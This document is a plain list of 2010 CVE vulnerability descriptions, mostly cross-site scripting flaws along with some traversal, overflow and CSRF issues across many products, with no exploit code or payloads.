[CVE-2010-3719] Eval injection vulnerability in IMAdminSchedTask.asp in the administrative interface for Symantec IM Manager 8.4.16 and earlier allows remote attackers to execute arbitrary code via unspecified parameters to the ScheduleTask method.
[CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
[CVE-2010-3715] Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) the RemoveXSS function, and allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (2) the backend.
[CVE-2010-3712] Cross-site scripting (XSS) vulnerability in Joomla! 1.5.x before 1.5.21 and 1.6.x before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via vectors involving "multiple encoded entities," as demonstrated by the query string to index.php in the com_weblinks or com_content component.
[CVE-2010-3700] VMware SpringSource Spring Security 2.x before 2.0.6 and 3.x before 3.0.4, and Acegi Security 1.0.0 through 1.0.7, as used in IBM WebSphere Application Server (WAS) 6.1 and 7.0, allows remote attackers to bypass security constraints via a path parameter.
[CVE-2010-3695] Cross-site scripting (XSS) vulnerability in fetchmailprefs.php in Horde IMP before 4.3.8, and Horde Groupware Webmail Edition before 1.2.7, allows remote attackers to inject arbitrary web script or HTML via the fm_id parameter in a fetchmail_prefs_save action, related to the Fetchmail configuration.
[CVE-2010-3693] Cross-site scripting (XSS) vulnerability in Horde Dynamic IMP (DIMP) before 1.1.5, and Horde Groupware Webmail Edition before 1.2.7, allows remote attackers to inject arbitrary web script or HTML via vectors related to displaying mailbox names.
[CVE-2010-3690] Multiple cross-site scripting (XSS) vulnerabilities in phpCAS before 1.1.3, when proxy mode is enabled, allow remote attackers to inject arbitrary web script or HTML via (1) a crafted Proxy Granting Ticket IOU (PGTiou) parameter to the callback function in client.php, (2) vectors involving functions that make getCallbackURL calls, or (3) vectors involving functions that make getURL calls.
[CVE-2010-3688] Directory traversal vulnerability in ADMIN/login.php in NetArtMEDIA WebSiteAdmin allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the lng parameter.
[CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
[CVE-2010-3636] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors.
[CVE-2010-3607] Cross-site scripting (XSS) vulnerability in AGENTS/index.php in NetArt MEDIA Real Estate Portal 2.0 allows remote authenticated users to inject arbitrary web script or HTML via the id parameter.
[CVE-2010-3605] Cross-site scripting (XSS) vulnerability in the powermail extension 1.5.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3602] Cross-site scripting (XSS) vulnerability in ProfileView.aspx in mojoPortal 2.3.4.3 and 2.3.5.1 allows remote attackers to inject arbitrary web script or HTML via the User ID parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-3579] Unspecified vulnerability in the (1) Sun Convergence 1 and (2) Sun Java Communications Suite 7 components in Oracle Sun Products Suite 1.0 and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail.
[CVE-2010-3575] Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 6.0, 6.2, 6.3, and 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Mail.
[CVE-2010-3564] Unspecified vulnerability in the Oracle Communications Messaging Server (Sun Java System Messaging Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Webmail. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that the Kerberos implementation does not properly check AP-REQ requests, which allows attackers to cause a denial of service in the JVM. NOTE: CVE has not investigated the apparent discrepancy between the two vendors regarding the consequences of this issue.
[CVE-2010-3563] Unspecified vulnerability in the Deployment component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable researcher that this is related to "how Web Start retrieves security policies," BasicServiceImpl, and forged policies that bypass sandbox restrictions.
[CVE-2010-3558] Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2010-3550] Unspecified vulnerability in the Java Web Start component in Oracle Java SE and Java for Business 6 Update 21 and 5.0 Update 25 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
[CVE-2010-3548] Unspecified vulnerability in the Java Naming and Directory Interface (JNDI) component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, and 1.4.2_27 allows remote attackers to affect confidentiality via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this allows remote attackers to determine internal IP addresses or "otherwise-protected internal network names."
[CVE-2010-3545] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Administration.
[CVE-2010-3544] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0 allows remote attackers to affect integrity and availability via unknown vectors related to Administration. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable source that this is cross-site request forgery (CSRF) that allows remote attackers to stop an instance via the management console.
[CVE-2010-3514] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 6.1 and 7.0 allows remote attackers to affect integrity via unknown vectors related to Web Container.
[CVE-2010-3512] Unspecified vulnerability in the Oracle iPlanet Web Server (Sun Java System Web Server) component in Oracle Sun Products Suite 7.0u8 allows remote authenticated users to affect confidentiality, related to DAV (WebDAV).
[CVE-2010-3510] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.3, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Node Manager.
[CVE-2010-3489] Cross-site scripting (XSS) vulnerability in netautor/napro4/home/login2.php in CMS Digital Workroom (formerly Netautor Professional) 5.5.0 allows remote attackers to inject arbitrary web script or HTML via the goback parameter.
[CVE-2010-3473] Open redirect vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2010-3472] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3471] Session fixation vulnerability in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 4.0.2.x before 4.0.2.7-P8AE-FP007 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2010-3470] Multiple cross-site scripting (XSS) vulnerabilities in the Workplace (aka WP) component in IBM FileNet P8 Application Engine (P8AE) 3.5.1 before 3.5.1-021 and 4.0.2.x before 4.0.2.7-P8AE-FP007 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3466] Cross-site scripting (XSS) vulnerability in index.php in the hosted_signup module in NetArt Media iBoutique.MALL 1.2 allows remote attackers to inject arbitrary web script or HTML via the tmpl parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-3465] Multiple cross-site scripting (XSS) vulnerabilities in XSE Shopping Cart 1.5.2.1 and 1.5.3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to Default.aspx and the (2) type parameter to SearchResults.aspx.
[CVE-2010-3463] Cross-site scripting (XSS) vulnerability in modules/search/search.class.php in SantaFox 2.02, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the search parameter to search.html.
[CVE-2010-3462] Cross-site scripting (XSS) vulnerability in backend/plugin/Registration/index.php in Mollify 1.6, 1.6.5.5, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the confirm parameter. NOTE: some of these details are obtained from third party information.
[CVE-2010-3460] Directory traversal vulnerability in the HTTP interface in AXIGEN Mail Server 7.4.1 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL.
[CVE-2010-3457] Multiple cross-site scripting (XSS) vulnerabilities in Symphony CMS 2.0.7 and 2.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) fields[website] parameter in the post comments feature in articles/a-primer-to-symphony-2s-default-theme/ or (2) send-email[recipient] parameter to about/. NOTE: some of these details are obtained from third party information.
[CVE-2010-3455] Cross-site scripting (XSS) vulnerability in index.php in AChecker 1.0 allows remote attackers to inject arbitrary web script or HTML via the uri parameter.
[CVE-2010-3447] Cross-site scripting (XSS) vulnerability in view.php in the file viewer in Horde Gollem before 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the file parameter in a view_file action.
[CVE-2010-3427] Multiple cross-site scripting (XSS) vulnerabilities in Open Classifieds 1.7.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) desc, (2) price, (3) title, and (4) place parameters to index.php and the (5) subject parameter to contact.htm, related to content/contact.php.
[CVE-2010-3425] Cross-site scripting (XSS) vulnerability in UserControls/Popups/frmHelp.aspx in SmarterStats 5.3, 5.3.3819, and possibly other 5.3 versions, allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2010-3424] Cross-site scripting (XSS) vulnerability in admin/sources/classes/bbcode/custom/defaults.php in Invision Power Board (IP.Board) 3.1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3421] Cross-site scripting (XSS) vulnerability in AffiliateLogin.asp in ProductCart 3, 4.1 SP1, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the redirectUrl parameter, a different vector than CVE-2004-2174 and CVE-2005-0995. NOTE: some of these details are obtained from third party information.
[CVE-2010-3420] Cross-site scripting (XSS) vulnerability in Products_Results.php in PowerStore 3.0 allows remote attackers to inject arbitrary web script or HTML via the totalRows_WADAProducts parameter.
[CVE-2010-3418] Multiple cross-site scripting (XSS) vulnerabilities in NetArt Media Car Portal 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) car_id parameter to index.php and (2) y parameter to include/images.php.
[CVE-2010-3398] Unspecified vulnerability in the webcontainer implementation in IBM Lotus Sametime Connect 8.5.1 before CF1 has unknown impact and attack vectors, aka SPRs LXUU87S57H and LXUU87S93W.
[CVE-2010-3330] Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Cross-Domain Information Disclosure Vulnerability."
[CVE-2010-3327] The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka "Anchor Element Information Disclosure Vulnerability."
[CVE-2010-3325] Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka "CSS Special Character Information Disclosure Vulnerability."
[CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257.
[CVE-2010-3320] Open redirect vulnerability in IBM Records Manager (RM) 4.5.x before 4.5.1.1-IER-FP001 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2010-3317] Cross-site scripting (XSS) vulnerability in IBM Records Manager (RM) 4.5.x before 4.5.1.1-IER-FP001 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3312] Epiphany 2.28 and 2.29, when WebKit and LibSoup are used, unconditionally displays a closed-lock icon for any URL beginning with the https: substring, without any warning to the user, which allows man-in-the-middle attackers to spoof arbitrary https web sites via a crafted X.509 server certificate.
[CVE-2010-3306] Directory traversal vulnerability in the modURL function in instance.c in Weborf before 0.12.3 allows remote attackers to read arbitrary files via ..%2f sequences in a URI.
[CVE-2010-3303] Multiple cross-site scripting (XSS) vulnerabilities in MantisBT before 1.2.3 allow remote authenticated administrators to inject arbitrary web script or HTML via (1) a plugin name, related to manage_plugin_uninstall.php
[CVE-2010-3294] Cross-site scripting (XSS) vulnerability in apc.php in the Alternative PHP Cache (APC) extension before 3.1.4 for PHP allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3291] Cross-site scripting (XSS) vulnerability in HP AssetCenter 5.0x through AC_5.03, and AssetManager 5.1x through AM_5.12 and 5.2x through AM_5.22, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3289] Cross-site scripting (XSS) vulnerability in HP Systems Insight Manager (SIM) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-3283] Open redirect vulnerability in HP System Management Homepage (SMH) before 6.2 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2010-3277] The installer in VMware Workstation 7.x before 7.1.2 build 301548 and VMware Player 3.x before 3.1.2 build 301548 renders an index.htm file if present in the installation directory, which might allow local users to trigger unintended interpretation of web script or HTML by creating this file.
[CVE-2010-3274] Multiple cross-site scripting (XSS) vulnerabilities in EmployeeSearch.cc in the Employee Search Engine in ZOHO ManageEngine ADSelfService Plus before 4.5 Build 4500 allow remote attackers to inject arbitrary web script or HTML via the searchString parameter in a (1) showList or (2) Search action.
[CVE-2010-3271] Multiple cross-site request forgery (CSRF) vulnerabilities in the Integrated Solutions Console (aka administrative console) in IBM WebSphere Application Server (WAS) 7.0.0.13 and earlier allow remote attackers to hijack the authentication of administrators for requests that disable certain security options via an Edit action to console/adminSecurityDetail.do followed by a save action to console/syncworkspace.do.
[CVE-2010-3270] Stack-based buffer overflow in Cisco WebEx Meeting Center T27LB before SP21 EP3 and T27LC before SP22 allows user-assisted remote authenticated users to execute arbitrary code by providing a crafted .atp file and then disconnecting from a meeting. NOTE: since this is a site-specific issue with no expected action for consumers, it might be REJECTed.
[CVE-2010-3269] Multiple stack-based buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to use of a function pointer in a callback mechanism.
[CVE-2010-3266] Multiple cross-site scripting (XSS) vulnerabilities in BugTracker.NET before 3.4.5 allow remote authenticated users to inject arbitrary web script or HTML via (1) the pcd parameter to edit_bug.aspx, (2) the bug_id parameter to edit_comment.aspx, (3) the id parameter to edit_user_permissions2.aspx, or (4) the default_name parameter to edit_customfield.aspx. NOTE: some of these details are obtained from third party information.
[CVE-2010-3263] Cross-site scripting (XSS) vulnerability in setup/frames/index.inc.php in the setup script in phpMyAdmin 3.x before 3.3.7 allows remote attackers to inject arbitrary web script or HTML via a server name.
[CVE-2010-3262] Cross-site scripting (XSS) vulnerability in Flock Browser 3.x before 3.0.0.4114 allows remote attackers to inject arbitrary web script or HTML via a crafted RSS feed.
[CVE-2010-3261] Directory traversal vulnerability in RSA Authentication Agent 7.0 before P2 for Web allows remote attackers to read unspecified data via unknown vectors.
[CVE-2010-3259] WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 6.0.472.53, and webkitgtk before 1.2.6, does not properly restrict read access to images derived from CANVAS elements, which allows remote attackers to bypass the Same Origin Policy and obtain potentially sensitive image data via a crafted web site.
[CVE-2010-3257] Use-after-free vulnerability in WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 6.0.472.53, and webkitgtk before 1.2.6, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors involving element focus.
[CVE-2010-3255] Google Chrome before 6.0.472.53 and webkitgtk before 1.2.6 do not properly handle counter nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2010-3254] The WebSockets implementation in Google Chrome before 6.0.472.53 does not properly handle integer values, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2010-3251] The WebSockets implementation in Google Chrome before 6.0.472.53 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors.
[CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability."
[CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability."
[CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule.
[CVE-2010-3208] Cross-site scripting (XSS) vulnerability in ajax.php in Wiccle Web Builder (WWB) 1.00 and 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the post_text parameter in a site custom_search action to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2010-3202] Cross-site scripting (XSS) vulnerability in Flock Browser 3.0.0.3989 allows remote attackers to inject arbitrary web script or HTML via a crafted bookmark.
[CVE-2010-3201] Cross-site scripting (XSS) vulnerability in NetWin Surgemail before 4.3g allows remote attackers to inject arbitrary web script or HTML via the username_ex parameter to the surgeweb program.
[CVE-2010-3186] IBM WebSphere Application Server (WAS) 7.x before 7.0.0.13, and WebSphere Application Server Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, when a JAX-WS application is used, does not properly handle an IncludeTimestamp setting in the WS-Security policy, which has unspecified impact and remote attack vectors.
[CVE-2010-3177] Multiple cross-site scripting (XSS) vulnerabilities in the Gopher parser in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, and SeaMonkey before 2.0.9, allow remote attackers to inject arbitrary web script or HTML via a crafted name of a (1) file or (2) directory on a Gopher server.
[CVE-2010-3172] CRLF injection vulnerability in Bugzilla before 3.2.9, 3.4.x before 3.4.9, 3.6.x before 3.6.3, and 4.0.x before 4.0rc1, when Server Push is enabled in a web browser, allows remote attackers to inject arbitrary HTTP headers and content, and conduct HTTP response splitting attacks, via a crafted URL.
[CVE-2010-3119] Google Chrome before 5.0.375.127 and webkitgtk before 1.2.6 do not properly support the Ruby language, which allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2010-3116] Multiple use-after-free vulnerabilities in WebKit, as used in Apple Safari before 4.1.3 and 5.0.x before 5.0.3, Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to improper handling of MIME types by plug-ins.
[CVE-2010-3115] Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, does not properly implement the history feature, which might allow remote attackers to spoof the address bar via unspecified vectors.
[CVE-2010-3114] The text-editing implementation in Google Chrome before 5.0.375.127, and webkitgtk before 1.2.6, does not check a node type before performing a cast, which has unspecified impact and attack vectors related to (1) DeleteSelectionCommand.cpp, (2) InsertLineBreakCommand.cpp, or (3) InsertParagraphSeparatorCommand.cpp in WebCore/editing/.
[CVE-2010-3113] Google Chrome before 5.0.375.127, and webkitgtk before 1.2.5, does not properly handle SVG documents, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors related to state changes when using DeleteButtonController.
[CVE-2010-3094] Multiple cross-site scripting (XSS) vulnerabilities in Drupal 6.x before 6.18 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via (1) an action description, (2) an action message, (3) a node, or (4) a taxonomy term, related to the actions feature and the trigger module.
[CVE-2010-3089] Multiple cross-site scripting (XSS) vulnerabilities in GNU Mailman before 2.1.14rc1 allow remote authenticated users to inject arbitrary web script or HTML via vectors involving (1) the list information field or (2) the list description field.
[CVE-2010-3082] Cross-site scripting (XSS) vulnerability in Django 1.2.x before 1.2.2 allows remote attackers to inject arbitrary web script or HTML via a csrfmiddlewaretoken (aka csrf_token) cookie.
[CVE-2010-3077] Cross-site scripting (XSS) vulnerability in util/icon_browser.php in the Horde Application Framework before 3.3.9 allows remote attackers to inject arbitrary web script or HTML via the subdir parameter.
[CVE-2010-3070] Cross-site scripting (XSS) vulnerability in NuSOAP 0.9.5, as used in MantisBT and other products, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to an arbitrary PHP script that uses NuSOAP classes.
[CVE-2010-3044] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3043.
[CVE-2010-3043] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3042, and CVE-2010-3044.
[CVE-2010-3042] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, a different vulnerability than CVE-2010-3041, CVE-2010-3043, and CVE-2010-3044.
[CVE-2010-3041] Multiple buffer overflows in the Cisco WebEx Recording Format (WRF) and Advanced Recording Format (ARF) Players T27LB before SP21 EP3 and T27LC before SP22 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted (1) .wrf or (2) .arf file, related to atas32.dll, a different vulnerability than CVE-2010-3042, CVE-2010-3043, and CVE-2010-3044.
[CVE-2010-3039] /usr/local/cm/bin/pktCap_protectData in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6, 7, and 8 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in a request to the administrative interface, aka Bug IDs CSCti52041 and CSCti74930.
[CVE-2010-3036] Multiple buffer overflows in the authentication functionality in the web-server module in Cisco CiscoWorks Common Services before 4.0 allow remote attackers to execute arbitrary code via a session on TCP port (1) 443 or (2) 1741, aka Bug ID CSCti41352.
[CVE-2010-3025] Multiple cross-site scripting (XSS) vulnerabilities in Tomaz Muraus Open Blog 1.2.1, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) excerpt parameter to application/modules/admin/controllers/posts.php, as reachable by admin/posts/edit
[CVE-2010-3023] Multiple cross-site scripting (XSS) vulnerabilities in DiamondList 0.1.6, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) category[description] parameter to user/main/update_category, which is not properly handled by _app/views/categories/index.html.erb
[CVE-2010-3022] Cross-site scripting (XSS) vulnerability in the Performance logging module in the Devel module 5.x before 5.x-1.3 and 6.x before 6.x-1.21 for Drupal allows remote authenticated users, with add url aliases and report access permissions, to inject arbitrary web script or HTML via crafted node paths in a URL.
[CVE-2010-3012] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 6.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this issue was originally assigned CVE-2010-3010 due to a CNA error.
[CVE-2010-3010] Cross-site scripting (XSS) vulnerability on the HP 3Com OfficeConnect Gigabit VPN Firewall 3CREVF100-73 with firmware before 1.0.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: a separate XSS issue for HP System Management Homepage (SMH) was originally assigned CVE-2010-3010 due to a CNA error, but CVE-2010-3012 is the appropriate identifier for the SMH issue.
[CVE-2010-3003] Cross-site scripting (XSS) vulnerability in HP Insight Diagnostics Online Edition before 8.5.0-11 on Linux allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2991] The IICAClient interface in the ICAClient library in the ICA Client ActiveX Object (aka ICO) component in Citrix Online Plug-in for Windows for XenApp & XenDesktop before 12.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HTML document that triggers the reading of a .ICA file.
[CVE-2010-2989] nessusd_www_server.nbin in the Nessus Web Server plugin 1.2.4 for Nessus allows remote attackers to obtain sensitive information via a request to the /feed method, which reveals the version in a response.
[CVE-2010-2988] Cross-site scripting (XSS) vulnerability in Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtf35333.
[CVE-2010-2987] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Wireless Control System (WCS) 7.x before 7.0.164, as used in Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCtg33854.
[CVE-2010-2985] Multiple cross-site scripting (XSS) vulnerabilities in IBM WebSphere Service Registry and Repository (WSRR) 6.3 allow remote attackers to inject arbitrary web script or HTML via (1) the searchTerm parameter to ServiceRegistry/HelpSearch.do or (2) the queryItems[0].value parameter to ServiceRegistry/QueryWizardProcessStep1.do.
[CVE-2010-2984] Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 on 4404 series controllers does not properly implement the WEBAUTH_REQD state, which allows remote attackers to bypass intended access restrictions via WLAN traffic, aka Bug ID CSCtb75305.
[CVE-2010-2981] Cisco Unified Wireless Network (UWN) Solution 7.x before 7.0.98.0 allows remote attackers to cause a denial of service (device crash) by pinging a virtual interface, aka Bug ID CSCte55370.
[CVE-2010-2974] Stack-based buffer overflow in the IConfigurationAccess interface in the Invensys Wonderware Archestra ConfigurationAccessComponent ActiveX control in Wonderware Application Server (WAS) before 3.1 SP2 P01, as used in the Wonderware Archestra Integrated Development Environment (IDE) and the InFusion Integrated Engineering Environment (IEE), allows remote attackers to execute arbitrary code via the first argument to the UnsubscribeData method.
[CVE-2010-2970] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.9.x before 1.9.3 allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/SlideShow.py, (2) action/anywikidraw.py, and (3) action/language_setup.py, a similar issue to CVE-2010-2487.
[CVE-2010-2969] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.7.3 and earlier, and 1.9.x before 1.9.3, allow remote attackers to inject arbitrary web script or HTML via crafted content, related to (1) action/LikePages.py, (2) action/chart.py, and (3) action/userprofile.py, a similar issue to CVE-2010-2487.
[CVE-2010-2962] drivers/gpu/drm/i915/i915_gem.c in the Graphics Execution Manager (GEM) in the Intel i915 driver in the Direct Rendering Manager (DRM) subsystem in the Linux kernel before 2.6.36 does not properly validate pointers to blocks of memory, which allows local users to write to arbitrary kernel memory locations, and consequently gain privileges, via crafted use of the ioctl interface, related to (1) pwrite and (2) pread operations.
[CVE-2010-2958] Cross-site scripting (XSS) vulnerability in libraries/Error.class.php in phpMyAdmin 3.x before 3.3.6 allows remote attackers to inject arbitrary web script or HTML via vectors related to a PHP backtrace and error messages (aka debugging messages), a different vulnerability than CVE-2010-3056.
[CVE-2010-2957] Cross-site scripting (XSS) vulnerability in Serendipity before 1.5.4, when "Remember me" logins are enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2917] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AJ Square AJ Article 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) emailid, (2) fname, (3) lname, (4) company, (5) address1, (6) address2, (7) city, (8) state, (9) zipcode, (10) phone, and (11) fax parameters in an update action. NOTE: some of these details are obtained from third party information.
[CVE-2010-2914] Cross-site scripting (XSS) vulnerability in nessusd_www_server.nbin in the Nessus Web Server plugin 1.2.4 for Nessus allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2904] Multiple cross-site scripting (XSS) vulnerabilities in the System Landscape Directory (SLD) component 6.4 through 7.02 in SAP NetWeaver allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to testsdic and the (2) helpstring parameter to paramhelp.jsp.
[CVE-2010-2886] Multiple cross-site scripting (XSS) vulnerabilities in Adobe RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2010-2885] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allows remote attackers to inject arbitrary web script or HTML via vectors related to WebHelp generation with RoboHelp for Word.
[CVE-2010-2858] Multiple cross-site scripting (XSS) vulnerabilities in news.php in SimpNews 2.47.03 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) layout and (2) sortorder parameters.
